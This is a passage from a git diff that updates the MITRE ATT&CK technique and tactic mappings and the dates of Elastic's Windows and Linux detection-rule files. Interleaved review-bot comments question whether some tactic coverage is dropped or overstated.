ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_masquerading_windows_dll.toml b/rules_building_block/defense_evasion_masquerading_windows_dll.toml index afce0c6f8cd..7a42e416ca9 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_dll.toml 
+++ b/rules_building_block/defense_evasion_masquerading_windows_dll.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/01" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -108,10 +108,12 @@ library where event.action == "load" and dll.Ext.relative_file_creation_time <= [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -122,37 +124,40 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" + +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [[rule.threat.technique]] id = "T1574" name = "Hijack Execution Flow" reference = "https://attack.mitre.org/techniques/T1574/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [[rule.threat.technique.subtechnique]] id = "T1574.001" name = "DLL" reference = "https://attack.mitre.org/techniques/T1574/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - 
diff --git a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml index 884c457808b..4387a5d03f7 100644 --- a/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml +++ b/rules_building_block/defense_evasion_masquerading_windows_system32_exe.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/08/20" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/05" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -82,10 +82,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" + [[rule.threat.technique.subtechnique]] id = "T1036.001" name = "Invalid Code Signature" @@ -96,22 +98,30 @@ id = "T1036.005" name = "Match Legitimate Resource Name or Location" reference = "https://attack.mitre.org/techniques/T1036/005/" +[[rule.threat.technique]] +id = "T1553" +name = "Subvert Trust Controls" +reference = "https://attack.mitre.org/techniques/T1553/" +[[rule.threat.technique.subtechnique]] +id = "T1553.002" +name = "Code Signing" +reference = "https://attack.mitre.org/techniques/T1553/002/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1554" name = "Compromise Host Software Binary" reference = "https://attack.mitre.org/techniques/T1554/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - diff --git a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml index eb6a59b0199..d685e67b893 100644 
--- a/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml +++ b/rules_building_block/defense_evasion_microsoft_security_compliance_admin_signal.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2026/02/20" integration = ["o365"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -54,30 +54,49 @@ event.dataset:o365.audit and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" + [[rule.threat.technique.subtechnique]] id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml index 6c94369c5a7..53fcb399412 100644 --- a/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml +++ b/rules_building_block/defense_evasion_msdt_suspicious_diagcab.toml 
@@ -2,7 +2,7 @@
 creation_date = "2023/09/26"
 integration = ["endpoint", "windows", "system"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -59,14 +59,31 @@ process where host.os.type == "windows" and event.action == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1218"
 name = "System Binary Proxy Execution"
 reference = "https://attack.mitre.org/techniques/T1218/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1204"
+name = "User Execution"
+reference = "https://attack.mitre.org/techniques/T1204/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1204.002"
+name = "Malicious File"
+reference = "https://attack.mitre.org/techniques/T1204/002/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules_building_block/defense_evasion_outlook_suspicious_child.toml b/rules_building_block/defense_evasion_outlook_suspicious_child.toml
index a081138d5d5..04c850ef329 100644
--- a/rules_building_block/defense_evasion_outlook_suspicious_child.toml
+++ b/rules_building_block/defense_evasion_outlook_suspicious_child.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2025/01/10"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2025/05/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -72,10 +72,12 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1036"
 name = "Masquerading"
 reference = "https://attack.mitre.org/techniques/T1036/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1036.001"
 name = "Invalid Code Signature"
@@ -86,27 +88,38 @@ id = "T1036.005"
 name = "Match Legitimate Resource Name or Location"
 reference = "https://attack.mitre.org/techniques/T1036/005/"
-
 [[rule.threat.technique]]
 id = "T1055"
 name = "Process Injection"
 reference = "https://attack.mitre.org/techniques/T1055/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1554"
 name = "Compromise Host Software Binary"
 reference = "https://attack.mitre.org/techniques/T1554/"
-
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1203"
+name = "Exploitation for Client Execution"
+reference = "https://attack.mitre.org/techniques/T1203/"
+
+[rule.threat.tactic]
+id = "TA0002"
+name = "Execution"
+reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml
index 88639b9b669..f3bea5cad31 100644
--- a/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml
+++ b/rules_building_block/defense_evasion_posh_obfuscation_proportion_special_chars.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2025/04/16"
 integration = ["windows"]
 maturity = "production"
-updated_date = "2026/02/09"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -174,39 +174,44 @@ from logs-windows.powershell_operational* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1027"
 name = "Obfuscated Files or Information"
 reference = "https://attack.mitre.org/techniques/T1027/"
+[[rule.threat.technique.subtechnique]]
+id = "T1027.010"
+name = "Command Obfuscation"
+reference = "https://attack.mitre.org/techniques/T1027/010/"
+
 [[rule.threat.technique]]
 id = "T1140"
 name = "Deobfuscate/Decode Files or Information"
 reference = "https://attack.mitre.org/techniques/T1140/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules_building_block/defense_evasion_service_disabled_registry.toml b/rules_building_block/defense_evasion_service_disabled_registry.toml
index c1f1d49dab7..504eedb76b9 100644
--- a/rules_building_block/defense_evasion_service_disabled_registry.toml
+++ b/rules_building_block/defense_evasion_service_disabled_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/29"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2024/05/21"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -48,26 +48,36 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1562.001"
+name = "Disable or Modify Tools"
+reference = "https://attack.mitre.org/techniques/T1562/001/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1489"
 name = "Service Stop"
 reference = "https://attack.mitre.org/techniques/T1489/"
-
 [rule.threat.tactic]
 id = "TA0040"
 name = "Impact"
 reference = "https://attack.mitre.org/tactics/TA0040/"
-
diff --git a/rules_building_block/defense_evasion_service_path_registry.toml b/rules_building_block/defense_evasion_service_path_registry.toml
index 9eb28e15955..1a9f0d9f598 100644
--- a/rules_building_block/defense_evasion_service_path_registry.toml
+++ b/rules_building_block/defense_evasion_service_path_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/29"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -51,48 +51,41 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.011"
+name = "Services Registry Permissions Weakness"
+reference = "https://attack.mitre.org/techniques/T1574/011/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-[[rule.threat.technique.subtechnique]]
-id = "T1543.003"
-name = "Windows Service"
-reference = "https://attack.mitre.org/techniques/T1543/003/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules_building_block/defense_evasion_services_exe_path.toml b/rules_building_block/defense_evasion_services_exe_path.toml
index 5a13a3271d6..872bb66c215 100644
--- a/rules_building_block/defense_evasion_services_exe_path.toml
+++ b/rules_building_block/defense_evasion_services_exe_path.toml
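Review bot: Deleting the whole second `[[rule.threat]]` block removes the rule's only TA0004 Privilege Escalation mapping, not just the duplicated T1543.003 entry, so the rule's tactic coverage silently shrinks to Defense Evasion and Persistence. In ATT&CK, T1543.003 and the newly added T1574.011 are both listed under Privilege Escalation as well as Persistence, so if the goal was only to dedupe the technique, a tactic-only `[[rule.threat]]` entry for TA0004 (if the schema allows one) would preserve the coverage; otherwise the drop deserves a sentence in the PR description. The `Tactic: Privilege Escalation` tag, if the `[rule]` section outside this hunk still carries it, would now be orphaned. The identical removal appears in defense_evasion_services_exe_path.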
@@ -2,7 +2,7 @@
 creation_date = "2023/08/29"
 integration = ["endpoint", "windows", "system"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -48,48 +48,41 @@ process where event.type == "start" and process.name : "sc.exe" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1112"
 name = "Modify Registry"
 reference = "https://attack.mitre.org/techniques/T1112/"
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1543"
 name = "Create or Modify System Process"
 reference = "https://attack.mitre.org/techniques/T1543/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1543.003"
 name = "Windows Service"
 reference = "https://attack.mitre.org/techniques/T1543/003/"
+[[rule.threat.technique]]
+id = "T1574"
+name = "Hijack Execution Flow"
+reference = "https://attack.mitre.org/techniques/T1574/"
+[[rule.threat.technique.subtechnique]]
+id = "T1574.011"
+name = "Services Registry Permissions Weakness"
+reference = "https://attack.mitre.org/techniques/T1574/011/"
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1543"
-name = "Create or Modify System Process"
-reference = "https://attack.mitre.org/techniques/T1543/"
-[[rule.threat.technique.subtechnique]]
-id = "T1543.003"
-name = "Windows Service"
-reference = "https://attack.mitre.org/techniques/T1543/003/"
-
-
-
-[rule.threat.tactic]
-id = "TA0004"
-name = "Privilege Escalation"
-reference = "https://attack.mitre.org/tactics/TA0004/"
-
diff --git a/rules_building_block/defense_evasion_unusual_process_path_wbem.toml b/rules_building_block/defense_evasion_unusual_process_path_wbem.toml
index 90930db47e5..2a00fb024b7 100644
--- a/rules_building_block/defense_evasion_unusual_process_path_wbem.toml
+++ b/rules_building_block/defense_evasion_unusual_process_path_wbem.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
 integration = ["endpoint", "windows", "system"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -55,14 +55,18 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1036"
 name = "Masquerading"
 reference = "https://attack.mitre.org/techniques/T1036/"
+[[rule.threat.technique.subtechnique]]
+id = "T1036.005"
+name = "Match Legitimate Resource Name or Location"
+reference = "https://attack.mitre.org/techniques/T1036/005/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules_building_block/defense_evasion_write_dac_access.toml b/rules_building_block/defense_evasion_write_dac_access.toml
index ca738169f21..26796bd548b 100644
--- a/rules_building_block/defense_evasion_write_dac_access.toml
+++ b/rules_building_block/defense_evasion_write_dac_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/15"
 integration = ["system", "windows"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -63,19 +63,31 @@ host.os.type: "windows" and event.action : ("Directory Service Access" or "objec
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1222"
 name = "File and Directory Permissions Modification"
 reference = "https://attack.mitre.org/techniques/T1222/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1222.001"
 name = "Windows File and Directory Permissions Modification"
 reference = "https://attack.mitre.org/techniques/T1222/001/"
-
-
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules_building_block/discovery_generic_account_groups.toml b/rules_building_block/discovery_generic_account_groups.toml
index eb8dadcd502..7c0ba29b8f0 100644
--- a/rules_building_block/discovery_generic_account_groups.toml
+++ b/rules_building_block/discovery_generic_account_groups.toml
@@ -3,7 +3,7 @@ bypass_bbr_timing = true
 creation_date = "2023/07/13"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2024/05/21"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -64,10 +64,17 @@ and not process.parent.name : "LTSVC.exe" and not user.id : "S-1-5-18"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1033"
+name = "System Owner/User Discovery"
+reference = "https://attack.mitre.org/techniques/T1033/"
+
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1069.001"
 name = "Local Groups"
@@ -78,11 +85,11 @@ id = "T1069.002"
 name = "Domain Groups"
 reference = "https://attack.mitre.org/techniques/T1069/002/"
-
 [[rule.threat.technique]]
 id = "T1087"
 name = "Account Discovery"
 reference = "https://attack.mitre.org/techniques/T1087/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1087.001"
 name = "Local Account"
@@ -93,15 +100,12 @@ id = "T1087.002"
 name = "Domain Account"
 reference = "https://attack.mitre.org/techniques/T1087/002/"
-
 [[rule.threat.technique]]
 id = "T1201"
 name = "Password Policy Discovery"
 reference = "https://attack.mitre.org/techniques/T1201/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
diff --git a/rules_building_block/discovery_hosts_file_access.toml b/rules_building_block/discovery_hosts_file_access.toml
index d371aaa1a97..a63b5a271f0 100644
--- a/rules_building_block/discovery_hosts_file_access.toml
+++ b/rules_building_block/discovery_hosts_file_access.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/11"
 integration = ["endpoint", "auditd_manager"]
 maturity = "production"
-updated_date = "2024/12/23"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -42,6 +42,11 @@ not ?process.working_directory in ("/opt/SolarWinds/Agent/bin/Plugins/SCM", "/op
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1016"
+name = "System Network Configuration Discovery"
+reference = "https://attack.mitre.org/techniques/T1016/"
+
 [[rule.threat.technique]]
 id = "T1018"
 name = "Remote System Discovery"
diff --git a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml
index 981adb13784..fbf32904d63 100644
--- a/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml
+++ b/rules_building_block/discovery_kernel_module_enumeration_via_proc.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/04/12"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2024/12/24"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -70,11 +70,15 @@ id = "T1082"
 name = "System Information Discovery"
 reference = "https://attack.mitre.org/techniques/T1082/"
+[[rule.threat.technique]]
+id = "T1518"
+name = "Software Discovery"
+reference = "https://attack.mitre.org/techniques/T1518/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable"]
diff --git a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml
index 3df1dd8bd91..341d4d6b255 100644
--- a/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml
+++ b/rules_building_block/discovery_kubectl_workload_and_cluster_discovery.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "auditd_manager", "crowdstrike", "cloud_defend"]
 maturity = "production"
 min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0"
 min_stack_version = "9.3.0"
-updated_date = "2026/02/05"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -59,16 +59,16 @@ process.name == "kubectl" and (
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1613"
-name = "Container and Resource Discovery"
-reference = "https://attack.mitre.org/techniques/T1613/"
-
 [[rule.threat.technique]]
 id = "T1069"
 name = "Permission Groups Discovery"
 reference = "https://attack.mitre.org/techniques/T1069/"
+[[rule.threat.technique]]
+id = "T1613"
+name = "Container and Resource Discovery"
+reference = "https://attack.mitre.org/techniques/T1613/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
diff --git a/rules_building_block/discovery_linux_modprobe_enumeration.toml b/rules_building_block/discovery_linux_modprobe_enumeration.toml
index eee45ca1da0..0e0adaa499e 100644
--- a/rules_building_block/discovery_linux_modprobe_enumeration.toml
+++ b/rules_building_block/discovery_linux_modprobe_enumeration.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/08"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/24"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -77,11 +77,33 @@ id = "T1082"
 name = "System Information Discovery"
 reference = "https://attack.mitre.org/techniques/T1082/"
+[[rule.threat.technique]]
+id = "T1083"
+name = "File and Directory Discovery"
+reference = "https://attack.mitre.org/techniques/T1083/"
+
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1547"
+name = "Boot or Logon Autostart Execution"
+reference = "https://attack.mitre.org/techniques/T1547/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1547.006"
+name = "Kernel Modules and Extensions"
+reference = "https://attack.mitre.org/techniques/T1547/006/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable"]
diff --git a/rules_building_block/discovery_linux_sysctl_enumeration.toml b/rules_building_block/discovery_linux_sysctl_enumeration.toml
index 332fd65a447..061062d0d88 100644
--- a/rules_building_block/discovery_linux_sysctl_enumeration.toml
+++ b/rules_building_block/discovery_linux_sysctl_enumeration.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/06/08"
 integration = ["auditd_manager"]
 maturity = "production"
-updated_date = "2025/12/24"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -79,6 +79,36 @@ id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1562"
+name = "Impair Defenses"
+reference = "https://attack.mitre.org/techniques/T1562/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1565"
+name = "Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1565.001"
+name = "Stored Data Manipulation"
+reference = "https://attack.mitre.org/techniques/T1565/001/"
+
+[rule.threat.tactic]
+id = "TA0040"
+name = "Impact"
+reference = "https://attack.mitre.org/tactics/TA0040/"
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["process.executable"]
diff --git a/rules_building_block/discovery_net_share_discovery_winlog.toml b/rules_building_block/discovery_net_share_discovery_winlog.toml
index 4d83aa90687..395fa517e79 100644
--- a/rules_building_block/discovery_net_share_discovery_winlog.toml
+++ b/rules_building_block/discovery_net_share_discovery_winlog.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/07/14"
 integration = ["windows", "system"]
 maturity = "production"
-updated_date = "2025/03/20"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
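Review bot: The two new `[[rule.threat]]` blocks tag a sysctl enumeration rule with Defense Evasion (T1562 Impair Defenses) and Impact (T1565.001 Stored Data Manipulation), both of which describe changing kernel parameters, while the only mapping visible in context is Discovery and the query itself is outside this hunk. If the query matches only read-style sysctl invocations, these mappings overstate what the rule detects and will inflate Impact and Defense Evasion coverage in ATT&CK heat maps built from the rule set; if it also matches write-style invocations, a sentence in the rule description saying so would make the mapping defensible. Either way the `tags` list in this file is untouched by the diff, so the new tactics are not reflected there.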
@@ -44,26 +44,44 @@ sequence by user.name, source.port, source.ip with maxspan=15s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1135"
 name = "Network Share Discovery"
 reference = "https://attack.mitre.org/techniques/T1135/"
-
 [rule.threat.tactic]
 id = "TA0007"
 name = "Discovery"
 reference = "https://attack.mitre.org/tactics/TA0007/"
+
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1039"
 name = "Data from Network Shared Drive"
 reference = "https://attack.mitre.org/techniques/T1039/"
-
 [rule.threat.tactic]
 id = "TA0009"
 name = "Collection"
 reference = "https://attack.mitre.org/tactics/TA0009/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1021"
+name = "Remote Services"
+reference = "https://attack.mitre.org/techniques/T1021/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1021.002"
+name = "SMB/Windows Admin Shares"
+reference = "https://attack.mitre.org/techniques/T1021/002/"
+
+[rule.threat.tactic]
+id = "TA0008"
+name = "Lateral Movement"
+reference = "https://attack.mitre.org/tactics/TA0008/"
diff --git a/rules_building_block/discovery_of_domain_groups.toml b/rules_building_block/discovery_of_domain_groups.toml
index c64491dcc33..5a7e4e36c5f 100644
--- a/rules_building_block/discovery_of_domain_groups.toml
+++ b/rules_building_block/discovery_of_domain_groups.toml
@@ -2,7 +2,7 @@
 creation_date = "2023/08/23"
 integration = ["endpoint", "auditd_manager", "crowdstrike"]
 maturity = "production"
-updated_date = "2025/10/17"
+updated_date = "2026/03/24"
 [rule]
 author = ["Elastic"]
@@ -44,14 +44,18 @@ process where host.os.type == "linux" and event.type == "start" and event.action
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
